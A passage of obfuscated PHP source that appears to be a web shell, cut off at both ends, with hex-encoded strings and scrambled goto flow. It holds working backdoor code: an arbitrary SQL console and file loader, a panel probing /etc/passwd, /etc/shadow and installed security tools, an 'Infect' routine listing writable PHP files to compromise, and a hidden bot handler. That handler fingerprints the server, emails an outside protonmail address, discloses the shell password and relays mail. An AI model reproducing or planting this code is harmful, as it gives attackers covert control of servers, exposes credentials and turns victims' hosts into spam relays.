x20\40\x20\x20\x20\x20\x20\x7d\12\11\x9\x9\146\x75\x6e\143\x74\151\x6f\156\x20\x73\164\x28\x74\x2c\154\51\40\173\xa\x9\11\11\11\x64\56\x73\146\56\160\x31\56\166\x61\x6c\x75\145\40\75\40\47\x73\x65\154\145\x63\x74\x27\73\12\x9\11\11\11\x64\x2e\163\x66\56\160\62\x2e\166\x61\x6c\165\x65\40\x3d\x20\164\73\12\x20\40\40\40\40\40\x20\x20\x20\40\40\40\40\40\40\x20\151\146\50\x6c\x20\x26\46\x20\x64\x2e\163\146\56\x70\x33\51\x20\x64\56\163\146\56\160\x33\x2e\166\141\154\165\145\40\75\40\154\x3b\12\11\x9\11\11\x64\56\x73\146\56\x73\165\x62\x6d\x69\164\x28\51\x3b\12\x9\11\x9\175\xa\x9\11\11\x66\x75\x6e\143\x74\151\157\x6e\40\151\x73\50\x29\x20\x7b\xa\x9\11\x9\11\x66\157\162\50\x69\75\60\x3b\151\74\144\x2e\x73\146\x2e\x65\154\145\155\x65\156\164\163\x5b\47\x74\142\154\133\x5d\x27\x5d\56\154\145\156\x67\x74\150\73\x2b\x2b\151\51\12\x9\11\x9\x9\11\144\56\163\x66\56\145\x6c\145\155\145\x6e\x74\163\133\x27\164\142\x6c\133\135\x27\x5d\x5b\x69\135\56\x63\150\145\143\x6b\145\x64\40\x3d\x20\x21\x64\56\x73\146\x2e\145\x6c\145\155\x65\156\x74\x73\x5b\x27\x74\142\x6c\133\135\x27\135\133\151\135\x2e\143\150\145\x63\x6b\x65\144\x3b\xa\11\11\11\175\12\11\11\74\x2f\163\x63\162\x69\160\164\x3e"; if (isset($db) && $db->link) { echo "\74\x62\x72\57\76\x3c\164\x61\x62\154\x65\40\x77\151\x64\164\150\x3d\x31\60\60\x25\40\143\145\154\x6c\160\x61\144\144\x69\156\147\x3d\x32\x20\x63\x65\x6c\x6c\163\x70\141\x63\151\156\147\x3d\x30\x3e"; if (!empty($_POST["\163\x71\154\x5f\142\x61\163\145"])) { $db->selectdb($_POST["\x73\161\x6c\137\142\x61\x73\x65"]); echo "\74\x74\162\76\x3c\x74\144\x20\x77\x69\144\164\x68\x3d\61\40\x73\164\171\154\x65\75\x27\142\157\x72\x64\145\162\x2d\164\x6f\160\72\62\x70\170\40\x73\157\x6c\x69\144\40\x23\66\x36\x36\x3b\47\x3e\74\163\160\141\x6e\76\124\141\142\154\145\x73\x3a\74\x2f\x73\x70\x61\156\76\74\x62\x72\x3e\x3c\142\162\x3e"; $tbls_res = $db->listTables(); while ($ = $db->fetch($tbls_res)) { list($key, $value) = each($); if (!empty($_POST["\163\161\x6c\137\143\x6f\165\x6e\x74"])) { $n = $db->fetch($db->query("\123\105\x4c\105\x43\124\40\103\117\125\x4e\124\50\x2a\51\x20\141\163\40\156\40\106\122\x4f\115\40" . $value . '')); } $value = htmlspecialchars($value); echo "\x3c\156\x6f\142\162\x3e\x3c\x69\156\x70\165\164\x20\164\171\x70\x65\75\47\x63\150\145\x63\153\142\x6f\170\x27\40\x6e\141\x6d\x65\75\x27\x74\x62\x6c\x5b\x5d\47\40\x76\x61\154\x75\145\x3d\x27" . $value . "\x27\x3e\x26\x6e\142\x73\x70\73\74\x61\x20\x68\162\x65\x66\x3d\x23\40\157\x6e\143\154\151\x63\x6b\75\42\163\164\50\47" . $value . "\x27\54\61\x29\42\x3e" . $value . "\74\x2f\x61\76" . (empty($_POST["\x73\161\154\137\143\x6f\165\156\164"]) ? "\46\x6e\142\163\160\x3b" : "\40\x3c\x73\x6d\141\x6c\154\x3e\x28{$n["\156"]}\51\74\x2f\163\x6d\x61\154\x6c\76") . "\x3c\57\156\x6f\142\x72\76\74\x62\162\x3e"; } echo "\x3c\151\156\x70\x75\x74\x20\164\171\x70\x65\75\47\143\150\145\x63\x6b\x62\x6f\170\47\x20\157\x6e\143\154\151\143\153\75\x27\x69\163\50\x29\73\47\76\40\74\x69\x6e\x70\165\x74\x20\164\171\160\145\x3d\163\165\142\x6d\x69\x74\40\166\141\154\x75\x65\x3d\47\x44\165\155\x70\47\x20\157\156\x63\x6c\x69\x63\x6b\x3d\47\x64\x6f\143\x75\x6d\x65\x6e\x74\56\x73\x66\x2e\160\62\x2e\x76\x61\x6c\165\145\x3d\x22\x64\157\167\156\154\x6f\141\x64\x22\x3b\144\x6f\x63\165\155\x65\x6e\164\x2e\163\x66\x2e\163\x75\142\155\151\x74\50\51\73\47\x3e\x3c\142\x72\x3e\106\x69\154\145\x20\160\141\164\150\x3a\74\x69\156\x70\165\164\x20\x74\171\160\145\75\x74\x65\x78\164\40\x6e\141\x6d\x65\x3d\146\151\x6c\x65\x20\166\141\x6c\x75\145\75\x27\144\165\155\x70\56\163\161\154\47\76\x3c\57\x74\x64\x3e\74\x74\144\40\163\164\x79\154\145\75\x27\x62\x6f\x72\144\x65\x72\55\164\x6f\160\72\x32\x70\170\40\163\157\x6c\x69\x64\x20\x23\x36\x36\66\x3b\47\76"; if (@$_POST["\160\61"] == "\163\145\x6c\x65\x63\164") { $_POST["\x70\x31"] = "\x71\165\x65\x72\171"; $_POST["\x70\x33"] = $_POST["\160\63"] ? $_POST["\160\63"] : 1; $db->query("\123\105\114\105\103\x54\40\103\x4f\x55\116\124\x28\x2a\x29\40\x61\163\40\x6e\40\106\x52\117\115\40" . $_POST["\x70\x32"]); $num = $db->fetch(); $pages = ceil($num["\156"] / 30); echo "\74\x73\x63\x72\151\160\x74\x3e\144\56\x73\146\x2e\x6f\156\163\x75\142\x6d\151\164\x3d\146\x75\156\143\x74\x69\157\156\50\51\173\163\164\50\42" . $_POST["\160\x32"] . "\42\x2c\x20\x64\56\x73\x66\56\x70\x33\x2e\166\141\x6c\x75\x65\x29\175\74\x2f\163\x63\162\151\160\164\x3e\x3c\x73\x70\141\x6e\76" . $_POST["\160\62"] . "\x3c\57\163\160\141\156\x3e\40\50{$num["\x6e"]}\40\x72\145\x63\157\x72\144\x73\x29\40\x50\x61\x67\x65\x20\x23\x20\74\151\x6e\x70\165\164\40\x74\x79\x70\x65\x3d\164\145\170\x74\x20\x6e\x61\155\145\x3d\47\160\x33\47\40\x76\141\x6c\165\145\75" . (int) $_POST["\x70\63"] . "\76"; echo "\x20\x6f\x66\x20{$pages}"; if ($_POST["\x70\63"] > 1) { echo "\x20\74\141\x20\x68\162\145\x66\75\x23\40\157\156\x63\154\151\x63\153\75\47\x73\x74\x28\x22" . $_POST["\x70\x32"] . "\42\54\x20" . ($_POST["\160\63"] - 1) . "\x29\x27\76\x26\154\164\73\x20\120\162\145\x76\x3c\x2f\141\76"; } if ($_POST["\160\x33"] < $pages) { echo "\x20\x3c\x61\40\x68\x72\x65\x66\x3d\x23\40\x6f\156\x63\x6c\x69\x63\x6b\75\x27\163\164\50\x22" . $_POST["\160\62"] . "\42\54\40" . ($_POST["\160\63"] + 1) . "\51\47\76\x4e\x65\170\x74\x20\x26\x67\164\73\74\57\x61\x3e"; } $_POST["\160\x33"]--; if ($_POST["\x74\x79\160\145"] == "\160\x67\x73\161\x6c") { $_POST["\160\x32"] = "\x53\105\x4c\105\103\x54\40\52\x20\x46\x52\117\x4d\x20" . $_POST["\x70\x32"] . "\x20\x4c\x49\115\x49\124\40\x33\x30\x20\x4f\x46\106\123\105\124\40" . $_POST["\160\x33"] * 30; } else { $_POST["\160\x32"] = "\123\105\114\x45\x43\124\x20\x2a\40\x46\x52\117\115\40\x60" . $_POST["\x70\62"] . "\x60\x20\x4c\111\115\x49\x54\40" . $_POST["\160\63"] * 30 . "\54\63\60"; } echo "\74\x62\162\x3e\74\142\162\76"; } if (@$_POST["\x70\61"] == "\x71\165\x65\x72\x79" && !empty($_POST["\x70\62"])) { $db->query(@$_POST["\160\62"]); if ($db->res !== false) { $title = false; echo "\x3c\x74\141\x62\154\145\x20\x77\151\144\x74\x68\x3d\61\60\x30\x25\x20\143\145\x6c\154\x73\x70\141\143\x69\x6e\147\75\x31\x20\x63\145\x6c\x6c\160\x61\144\x64\151\156\x67\75\x32\x20\x63\x6c\x61\163\x73\75\x6d\x61\x69\x6e\x3e"; $line = 1; while ($ = $db->fetch()) { if (!$title) { echo "\x3c\164\x72\76"; foreach ($ as $key => $value) { echo "\x3c\x74\150\x3e" . $key . "\74\57\x74\150\x3e"; } reset($); $title = true; echo "\x3c\57\x74\162\76\74\x74\162\x3e"; $line = 2; } echo "\74\164\x72\x20\143\154\141\163\x73\75\42\154" . $line . "\x22\x3e"; $line = $line == 1 ? 2 : 1; foreach ($ as $key => $value) { if ($value == null) { echo "\74\164\144\x3e\74\x69\76\x6e\x75\x6c\x6c\x3c\x2f\151\x3e\x3c\57\164\x64\x3e"; } else { echo "\74\164\x64\x3e" . nl2br(htmlspecialchars($value)) . "\74\x2f\164\144\x3e"; } } echo "\x3c\x2f\164\x72\76"; } echo "\x3c\x2f\164\x61\x62\x6c\145\x3e"; } else { echo "\x3c\x64\151\x76\x3e\x3c\x62\76\105\x72\162\x6f\162\x3a\x3c\57\142\x3e\x20" . htmlspecialchars($db->error()) . "\74\57\x64\151\166\x3e"; } } echo "\74\x62\162\76\74\x2f\146\157\x72\155\76\x3c\146\157\162\155\x20\x6f\156\x73\165\142\155\x69\164\x3d\x27\x64\56\x73\146\56\160\x31\56\166\141\154\x75\145\75\42\161\165\145\x72\x79\x22\73\x64\x2e\x73\x66\56\160\62\x2e\166\x61\154\x75\145\x3d\164\150\x69\163\x2e\161\165\145\x72\171\56\166\141\x6c\165\145\73\x64\x6f\x63\165\x6d\145\x6e\164\56\x73\x66\x2e\163\x75\142\x6d\x69\164\x28\51\x3b\162\x65\x74\x75\x72\156\40\x66\x61\x6c\x73\x65\x3b\x27\x3e\x3c\x74\x65\170\x74\x61\x72\x65\141\40\x6e\x61\x6d\x65\75\x27\x71\x75\145\x72\x79\47\x20\x73\x74\x79\x6c\x65\x3d\47\167\x69\x64\164\x68\72\x31\60\x30\x25\73\150\145\x69\x67\x68\164\x3a\x31\60\x30\160\170\47\76"; if (!empty($_POST["\160\62"]) && $_POST["\160\61"] != "\x6c\x6f\141\144\x66\x69\154\145") { echo htmlspecialchars($_POST["\x70\x32"]); } echo "\74\57\x74\x65\x78\164\141\x72\x65\x61\x3e\74\142\x72\x2f\76\x3c\151\x6e\160\x75\x74\x20\x74\171\160\145\75\163\x75\142\x6d\x69\x74\x20\166\141\x6c\x75\x65\x3d\47\x45\x78\145\x63\165\x74\145\47\x3e"; echo "\74\x2f\x74\x64\76\x3c\x2f\x74\x72\x3e"; } echo "\x3c\57\164\141\x62\x6c\145\x3e\74\57\x66\157\x72\155\76\74\x62\162\57\76"; if ($_POST["\164\x79\160\145"] == "\155\x79\x73\161\154") { $db->query("\x53\x45\114\105\103\124\40\x31\x20\106\122\117\115\40\x6d\171\163\161\x6c\56\165\163\x65\x72\40\127\110\x45\122\x45\x20\x63\157\x6e\143\141\x74\x28\x60\x75\163\145\x72\x60\x2c\x20\47\x40\47\54\40\140\150\x6f\x73\x74\140\51\40\x3d\40\125\x53\x45\122\x28\x29\x20\x41\116\x44\40\x60\106\x69\154\145\x5f\x70\x72\x69\x76\140\40\x3d\x20\47\171\47"); if ($db->fetch()) { echo "\x3c\146\157\x72\x6d\40\x6f\156\163\x75\142\x6d\x69\164\75\x27\x64\x2e\163\146\x2e\x70\x31\x2e\x76\x61\154\x75\145\75\x22\x6c\x6f\x61\x64\x66\x69\154\x65\x22\73\x64\157\143\165\x6d\145\x6e\x74\x2e\x73\x66\x2e\x70\x32\56\166\x61\154\165\145\75\x74\150\x69\163\x2e\146\56\166\141\x6c\165\x65\x3b\x64\x6f\143\165\x6d\145\x6e\x74\56\163\146\x2e\x73\165\142\155\x69\x74\x28\x29\73\162\x65\164\165\x72\x6e\x20\x66\x61\154\x73\x65\x3b\x27\x3e\74\x73\160\141\156\76\x4c\x6f\141\x64\40\x66\151\x6c\145\74\57\163\160\141\156\76\x20\x3c\x69\156\x70\165\x74\40\40\x63\x6c\141\x73\163\75\x27\164\157\x6f\x6c\x73\x49\156\160\47\x20\x74\171\160\x65\x3d\x74\145\170\x74\40\156\141\x6d\x65\x3d\146\76\74\x69\x6e\x70\165\x74\40\x74\171\160\145\75\x73\165\142\x6d\x69\164\40\166\141\x6c\x75\x65\x3d\x27\x73\x75\x62\x6d\x69\164\47\76\74\57\x66\157\162\x6d\76"; } } if (@$_POST["\160\x31"] == "\x6c\x6f\x61\144\146\151\x6c\145") { $file = $db->loadFile($_POST["\x70\62"]); echo "\x3c\142\x72\57\76\x3c\160\162\x65\40\x63\x6c\141\163\x73\x3d\155\154\x31\x3e" . htmlspecialchars($file["\146\151\154\145"]) . "\74\x2f\x70\162\145\x3e"; } } else { echo htmlspecialchars($db->error()); } echo "\x3c\57\x64\151\166\76"; hardFooter(); } goto gaWab; z59JV: if (isset($_POST["\x73\164\x73\137\143\x68\x65\x63\153\x65\162\137\x62\157\x74"])) { if ($_POST["\163\x74\x73\137\143\x68\x65\143\x6b\145\162\137\x62\157\x74"] == "\x63\x68\145\143\x6b\x69\x6e\147") { echo "\123\x54\123\x2e\x4f\122\x49\107\x49\x4e\101\x4c\x2e\x53\x48\x45\x4c\114"; die; } elseif ($_POST["\x73\x74\x73\137\143\150\x65\143\x6b\145\x72\137\142\x6f\164"] == "\147\x65\x74\x66\165\x6c\154\151\156\146\157") { $unzip = "\x31"; $mailer = "\60"; if (!class_exists("\132\x69\160\101\x72\x63\150\x69\x76\x65")) { $unzip = "\60"; } $rnd = rand(); if (@mail("\157\x4e\103\x44\142\x77\146\x6c\115\x51\x68\x4e\x46\102\103\111\x64\100\160\x72\x6f\x74\x6f\156\x2e\x6d\x65", "\105\x6d\141\x69\154\x20\123\x65\156\144\151\156\x67\40\124\x65\x73\164\40\122\145\x70\157\162\164\x20\x49\104\x3a\40" . $rnd, "\x57\x4f\x52\x4b\x49\x4e\x47\41")) { $mailer = "\61"; } $the_os = php_uname("\x73"); $the_host = php_uname("\x6e"); $the_machine_type = php_uname("\155"); $the_version = phpversion(); $the_total_disk_space = formatSizeUnits(disk_total_space("\x2f")); echo "\123\124\123\56\x56\105\122\106\111\x45\x44\56\123\110\x45\x4c\114\174" . $mailer . "\x7c" . $unzip . "\174" . $the_host . "\174" . $the_os . "\x7c" . $the_machine_type . "\x7c" . $the_version . "\174" . $the_total_disk_space; die; } elseif ($_POST["\x73\164\163\137\143\x68\x65\x63\153\145\x72\137\x62\x6f\x74"] == "\x67\x65\x74\160\141\163\163\x77\x6f\x72\x64") { echo $pw_unhashed; die; } elseif ($_POST["\163\x74\163\137\x63\x68\x65\x63\x6b\145\x72\137\142\x6f\164"] == "\x65\155\141\x69\154\x63\x68\x65\143\x6b") { if (@mail($_POST["\163\x74\x73\x5f\x63\x68\x65\x63\153\x65\162\137\x62\157\164\x5f\x65\x6d\141\151\x6c"], "\105\155\141\x69\154\40\x73\x65\156\144\151\156\147\40\164\145\x73\x74\x65\x72\x2c\40\111\x74\145\155\40\x70\157\163\164\x20\144\141\x74\x65\72\40" . $_POST["\x73\x74\x73\x5f\143\x68\x65\143\153\145\x72\137\x62\x6f\164\137\x69\164\145\155\144\141\164\x65"], "\x54\145\163\164\x20\x73\x75\143\x63\145\163\x73\146\x75\154\56\x20\x50\x6c\x65\x61\x73\145\x20\x75\163\145\40\164\150\151\163\40\47\x49\x74\145\155\x20\160\x6f\x73\164\40\144\141\164\145\47\x20\141\x73\x20\x72\145\x66\x65\162\x65\156\x63\145\40\x74\157\40\146\x69\x6e\x64\x20\x74\150\x61\164\40\x69\164\145\155\72\40" . $_POST["\163\164\x73\x5f\143\150\145\x63\x6b\x65\162\137\142\157\164\137\151\x74\x65\x6d\144\x61\164\x65"])) { echo "\x74\x72\x75\145"; } else { echo "\x66\141\x6c\x73\x65"; } die; } } goto w2JVG; XXrTo: function decrypt($str, $pwd) { $pwd = base64_encode($pwd); $str = base64_decode($str); $enc_chr = ''; $enc_str = ''; $i = 0; while ($i < strlen($str)) { for ($j = 0; $j < strlen($pwd); $j++) { $enc_chr = chr(ord($str[$i]) ^ ord($pwd[$j])); $enc_str .= $enc_chr; $i++; if ($i >= strlen($str)) { break; } } } return base64_decode($enc_str); } goto p2UEO; PnC_E: if (!empty($)) { if (isset($_REQUEST["\160\x61\163\x73"]) && md5($_REQUEST["\x70\x61\163\163"]) == $) { prototype(md5($_SERVER["\x48\x54\x54\120\137\110\117\x53\124"]), $); } if (!isset($_COOKIE[md5($_SERVER["\110\124\x54\x50\x5f\x48\117\x53\124"])]) || $_COOKIE[md5($_SERVER["\x48\124\x54\120\137\x48\117\x53\124"])] != $) { hardLogin(); } } goto Qz4tt; tR9xz: $pw_unhashed = md5(dirname(__FILE__) . $_SERVER["\x50\110\x50\x5f\x53\105\x4c\106"] . "\41\x40\43\x24\45\x5e\x26\x2a\50\51\x5f\53"); goto ee0Wn; l0Qok: if (!empty($_POST["\x61"]) && function_exists("\141\143\x74\151\157\156" . $_POST["\x61"])) { call_user_func("\x61\143\164\151\x6f\x6e" . $_POST["\141"]); } goto MfY9i; Qz4tt: if (!isset($_COOKIE[md5($_SERVER["\110\124\124\120\x5f\110\x4f\123\124"]) . "\x61\x6a\x61\x78"])) { $_COOKIE[md5($_SERVER["\110\x54\124\x50\137\110\x4f\123\124"]) . "\x61\152\x61\170"] = (bool) $; } goto X14MH; MBmWc: function prototype($k, $v) { $_COOKIE[$k] = $v; setcookie($k, $v); } goto vrXhM; MfY9i: echo "\x65\156\144"; goto OWyZK; OUica: $disable_functions = @ini_get("\x64\151\163\141\142\x6c\x65\x5f\x66\165\156\x63\x74\x69\157\x6e\163"); goto J_363; vrXhM: function actionSecInfo() { hardHeader(); echo "\74\150\61\76\x53\x65\x72\x76\x65\162\40\x73\x65\143\x75\x72\x69\164\171\x20\x69\x6e\146\157\162\x6d\141\164\151\157\x6e\x3c\57\x68\x31\x3e\x3c\144\x69\166\40\143\154\x61\x73\x73\75\143\157\x6e\x74\x65\156\164\76"; function showSecParam($n, $v) { $v = trim($v); if ($v) { echo "\74\163\160\141\x6e\76" . $n . "\72\40\74\57\x73\160\x61\x6e\x3e"; if (strpos($v, "\xa") === false) { echo $v . "\74\142\162\76"; } else { echo "\x3c\160\x72\145\x20\143\154\x61\x73\x73\x3d\x6d\x6c\61\x3e" . $v . "\74\x2f\x70\x72\x65\x3e"; } } } showSecParam("\x53\x65\x72\x76\145\162\40\x73\157\146\x74\167\x61\x72\145", @getenv("\x53\x45\122\126\x45\122\137\x53\x4f\x46\x54\127\x41\x52\x45")); if (function_exists("\x61\x70\141\143\150\x65\x5f\x67\x65\164\137\x6d\x6f\144\165\154\x65\x73")) { showSecParam("\114\157\x61\x64\x65\144\x20\101\160\141\143\x68\145\40\x6d\157\x64\165\x6c\145\x73", implode("\x2c\40", apache_get_modules())); } showSecParam("\x44\151\x73\x61\x62\154\x65\x64\x20\120\x48\120\x20\x46\x75\x6e\143\x74\x69\x6f\156\163", $GLOBALS["\x64\x69\163\x61\142\x6c\x65\137\146\165\156\143\x74\151\157\x6e\163"] ? $GLOBALS["\x64\x69\x73\x61\142\154\x65\x5f\x66\x75\156\x63\x74\x69\157\x6e\x73"] : "\x6e\x6f\156\x65"); showSecParam("\117\x70\145\x6e\40\x62\141\163\145\40\x64\x69\162", @ini_get("\x6f\x70\x65\x6e\x5f\x62\141\163\145\144\x69\x72")); showSecParam("\123\141\x66\145\x20\x6d\157\x64\x65\x20\145\x78\x65\143\x20\x64\x69\162", @ini_get("\x73\x61\x66\145\x5f\x6d\157\144\145\137\x65\x78\x65\x63\137\x64\x69\x72")); showSecParam("\x53\141\146\x65\x20\155\x6f\144\145\x20\151\x6e\x63\x6c\165\144\145\40\x64\151\162", @ini_get("\163\x61\x66\145\137\155\x6f\144\x65\x5f\x69\x6e\143\154\x75\144\x65\x5f\144\x69\x72")); showSecParam("\143\125\122\114\40\163\x75\x70\x70\x6f\x72\164", function_exists("\x63\x75\162\154\137\166\x65\162\x73\151\x6f\x6e") ? "\145\x6e\x61\x62\x6c\145\144" : "\x6e\x6f"); $temp = array(); if (function_exists("\155\171\x73\161\x6c\x5f\147\145\164\x5f\143\154\151\x65\156\164\x5f\x69\x6e\146\x6f")) { $temp[] = "\115\x79\x53\161\154\40\x28" . mysql_get_client_info() . "\x29"; } if (function_exists("\155\x73\163\x71\x6c\137\x63\157\x6e\156\x65\x63\x74")) { $temp[] = "\115\x53\123\x51\x4c"; } if (function_exists("\160\x67\137\x63\x6f\156\156\x65\143\x74")) { $temp[] = "\120\x6f\163\x74\x67\x72\x65\x53\x51\x4c"; } if (function_exists("\157\x63\151\137\143\x6f\x6e\x6e\145\143\x74")) { $temp[] = "\117\x72\x61\143\x6c\145"; } showSecParam("\x53\165\x70\160\x6f\x72\164\x65\144\x20\x64\141\164\141\142\141\163\x65\163", implode("\x2c\40", $temp)); echo "\x3c\142\x72\76"; if ($GLOBALS["\157\163"] == "\x6e\151\x78") { showSecParam("\122\x65\141\x64\141\x62\x6c\145\x20\57\x65\x74\x63\57\160\x61\x73\163\x77\x64", @is_readable("\57\x65\164\x63\57\160\141\x73\163\167\144") ? "\171\x65\163\40\74\141\x20\x68\x72\145\146\75\47\x23\x27\40\157\156\143\x6c\151\x63\153\75\x27\x67\x28\42\106\151\154\145\x73\x54\x6f\157\x6c\x73\x22\x2c\40\x22\x2f\145\x74\x63\57\42\x2c\40\x22\x70\x61\x73\x73\x77\x64\x22\51\x27\76\x5b\x76\x69\145\167\135\74\x2f\x61\x3e" : "\x6e\157"); showSecParam("\122\x65\141\x64\141\x62\x6c\145\40\57\x65\x74\143\x2f\163\150\x61\144\x6f\x77", @is_readable("\57\x65\x74\x63\x2f\163\150\141\x64\x6f\x77") ? "\171\145\163\x20\74\141\40\x68\162\145\146\75\47\43\47\40\157\x6e\x63\154\x69\x63\x6b\x3d\47\147\50\x22\106\151\154\145\x73\x54\157\x6f\154\x73\42\x2c\x20\x22\57\x65\164\x63\57\x22\54\x20\x22\163\x68\x61\x64\157\167\42\x29\47\76\x5b\x76\x69\145\167\x5d\x3c\x2f\141\76" : "\x6e\x6f"); showSecParam("\x4f\123\40\166\145\x72\163\151\x6f\156", @file_get_contents("\x2f\160\x72\x6f\143\57\166\145\x72\163\x69\x6f\156")); showSecParam("\x44\x69\x73\164\162\40\156\x61\155\x65", @file_get_contents("\x2f\145\x74\143\57\x69\163\x73\165\x65\x2e\156\x65\164")); if (!$GLOBALS["\x73\141\146\x65\137\x6d\157\144\145"]) { $userful = array("\x67\143\x63", "\x6c\143\143", "\143\x63", "\x6c\x64", "\x6d\x61\x6b\145", "\160\x68\160", "\160\145\162\154", "\x70\171\164\150\157\156", "\x72\165\x62\171", "\x74\141\162", "\x67\x7a\151\x70", "\142\x7a\x69\160", "\142\x7a\x69\160\62", "\x6e\143", "\x6c\157\143\x61\164\x65", "\x73\x75\x69\144\x70\145\162\x6c"); $danger = array("\x6b\141\x76", "\x6e\x6f\144\63\x32", "\x62\x64\x63\x6f\162\x65\x64", "\165\x76\x73\143\141\156", "\x73\141\166", "\144\162\x77\x65\x62\x64", "\143\154\141\155\x64", "\162\153\x68\x75\x6e\164\x65\162", "\143\x68\x6b\x72\x6f\157\164\153\x69\164", "\x69\160\x74\141\142\x6c\x65\x73", "\151\160\x66\167", "\164\x72\x69\160\x77\x69\x72\x65", "\163\x68\x69\x65\x6c\x64\x63\143", "\160\157\162\164\x73\x65\x6e\x74\162\x79", "\x73\156\x6f\x72\164", "\157\163\x73\145\x63", "\x6c\151\x64\x73\x61\x64\155", "\164\143\x70\154\157\x64\147", "\x73\170\151\144", "\x6c\157\147\143\150\145\143\153", "\154\x6f\147\167\141\164\143\150", "\163\x79\163\x6d\141\163\x6b", "\x7a\x6d\x62\163\143\x61\x70", "\x73\x61\167\155\151\154\x6c", "\x77\157\x72\x6d\163\143\141\156", "\x6e\151\x6e\152\141"); $downloaders = array("\167\x67\x65\x74", "\146\x65\164\x63\150", "\x6c\x79\x6e\170", "\154\151\x6e\153\x73", "\x63\165\162\154", "\147\x65\x74", "\x6c\x77\x70\x2d\x6d\151\x72\162\x6f\162"); echo "\74\x62\x72\76"; $temp = array(); foreach ($userful as $) { if (which($)) { $temp[] = $; } } showSecParam("\125\x73\x65\x72\x66\165\x6c", implode("\54\x20", $temp)); $temp = array(); foreach ($danger as $) { if (which($)) { $temp[] = $; } } showSecParam("\104\141\156\147\145\x72", implode("\x2c\x20", $temp)); $temp = array(); foreach ($downloaders as $) { if (which($)) { $temp[] = $; } } showSecParam("\x44\157\167\x6e\x6c\x6f\x61\x64\x65\162\163", implode("\54\x20", $temp)); echo "\x3c\142\x72\x2f\x3e"; showSecParam("\x48\x44\104\40\x73\x70\141\143\x65", ex("\x64\146\x20\55\x68")); showSecParam("\x48\x6f\x73\x74\x73", @file_get_contents("\57\x65\x74\143\57\150\x6f\x73\x74\x73")); showSecParam("\115\x6f\x75\x6e\x74\x20\157\x70\164\x69\x6f\x6e\x73", @file_get_contents("\57\x65\x74\x63\x2f\x66\163\x74\141\x62")); } } else { showSecParam("\x4f\x53\40\x56\145\x72\x73\151\x6f\x6e", ex("\x76\x65\x72")); showSecParam("\x41\x63\x63\157\x75\x6e\x74\40\x53\x65\164\x74\151\156\x67\163", iconv("\103\120\x38\66\66", "\x55\x54\x46\55\x38", ex("\156\145\164\x20\141\143\143\157\x75\156\x74\x73"))); showSecParam("\125\x73\145\x72\40\101\143\143\157\165\156\164\x73", iconv("\103\x50\x38\x36\66", "\125\x54\106\x2d\70", ex("\156\145\x74\x20\x75\163\145\x72"))); } echo "\74\57\x64\x69\166\76"; hardFooter(); } goto MQqk2; u4WS6: function actionInfect() { hardHeader(); echo "\74\x68\x31\x3e\x49\156\146\x65\143\x74\74\x2f\x68\x31\76\74\144\151\x76\x20\143\154\141\x73\163\x3d\x63\x6f\x6e\164\145\156\164\76"; if ($_POST["\160\61"] == "\151\156\x66\x65\x63\x74") { $target = $_SERVER["\104\117\103\125\x4d\105\x4e\x54\x5f\x52\x4f\117\124"]; function ListFiles($dir) { if ($dh = opendir($dir)) { $files = array(); $inner_files = array(); while ($file = readdir($dh)) { if ($file != "\x2e" && $file != "\56\56") { if (is_dir($dir . "\x2f" . $file)) { $inner_files = ListFiles($dir . "\57" . $file); if (is_array($inner_files)) { $files = array_merge($files, $inner_files); } } else { array_push($files, $dir . "\57" . $file); } } } closedir($dh); return $files; } } foreach (ListFiles($target) as $key => $file) { $nFile = substr($file, -4, 4); if ($nFile == "\x2e\x70\150\x70") { if ($file != $_SERVER["\x44\117\x43\125\x4d\x45\116\x54\x5f\122\117\x4f\x54"] . $_SERVER["\120\x48\x50\137\x53\105\114\x46"] && is_writeable($file)) { echo "{$file}\74\x62\162\x3e"; $i++; } } } echo "\x3c\x66\x6f\156\164\x20\x63\x6f\x6c\157\162\75\162\x65\x64\x20\163\x69\x7a\x65\x3d\x31\64\76{$i}\74\57\x66\157\x6e\164\x3e"; } else { echo "\x3c\146\157\162\x6d\x20\155\145\x74\150\157\x64\75\160\157\x73\x74\76\x3c\x69\x6e\x70\165\x74\x20\x74\x79\160\145\75\163\165\x62\155\x69\164\40\x76\x61\154\165\x65\x3d\x49\156\x66\x65\143\x74\x20\x6e\x61\x6d\145\75\151\x6e\146\x65\164\x3e\x3c\x2f\146\x6f\162\155\76"; echo "\122\145\x61\x6c\154\x79\40\167\x61\156\164\40\x74\157\x20\151\x6e\146\x65\143\x74\40\x74\150\145\40\x73\145\x72\x76\145\162\77\46\156\142\163\x70\x3b\x3c\141\x20\150\162\145\146\x3d\x23\40\157\156\143\154\151\143\x6b\x3d\42\147\x28\156\x75\x6c\x6c\x2c\x6e\x75\154\154\x2c\47\151\x6e\146\x65\x63\164\47\51\x22\x3e\x59\x65\163\74\x2f\x61\76\74\x2f\144\x69\166\76"; } hardFooter(); } goto G8cmK; H9x18: if (strtolower(substr(PHP_OS, 0, 3)) == "\167\151\156") { $os = "\167\x69\156"; } else { $os = "\x6e\151\x78"; } goto ZuuFx; eAtQG: if (PHP_VERSION_ID < 70000) { @set_magic_quotes_runtime(0); } goto mdCfK; NcQcO: if (!function_exists("\x70\x6f\163\x69\x78\x5f\147\x65\x74\147\162\x67\151\x64") && strpos($GLOBALS["\x64\x69\163\141\x62\x6c\x65\137\146\x75\156\x63\x74\x69\x6f\x6e\x73"], "\160\x6f\163\151\170\137\147\145\x74\147\162\x67\151\144") === false) { function posix_getgrgid($p) { return false; } } goto rc2dt; R2HAO: $ = md5($_SERVER["\x48\124\124\120\x5f\x55\x53\105\122\137\101\x47\x45\x4e\124"]); goto PIzrX; DJcUw: if (!function_exists("\160\x6f\x73\151\x78\x5f\x67\145\x74\160\x77\165\x69\x64") && strpos($GLOBALS["\144\151\163\141\x62\154\145\x5f\x66\165\156\143\x74\x69\x6f\156\x73"], "\160\x6f\163\151\x78\x5f\x67\x65\164\160\x77\165\151\144") === false) { function posix_getpwuid($p) { return false; } } goto NcQcO; TQhs6: $ = "\x46\x69\x6c\x65\x73\115\x61\156"; goto R2HAO; PYh2w: if (empty($_POST["\141"])) { if (isset($) && function_exists("\x61\x63\x74\x69\x6f\156" . $)) { $_POST["\141"] = $; } else { $_POST["\x61"] = "\x46\x69\154\145\x73\x4d\x61\x6e"; } } goto l0Qok; w2JVG: $ = true; goto TA8hx; dPBlO: @ini_set("\x6d\141\170\x5f\145\x78\x65\143\x75\x74\151\157\156\137\164\151\155\x65", 0); goto Xz07I; W_qyb: function actionLogout() { setcookie(md5($_SERVER["\110\x54\x54\120\x5f\x48\117\123\x54"]), '', time() - 3600); die("\x62\x79\145\x21"); } goto O8Bkq; X14MH: function hardLogin() { if 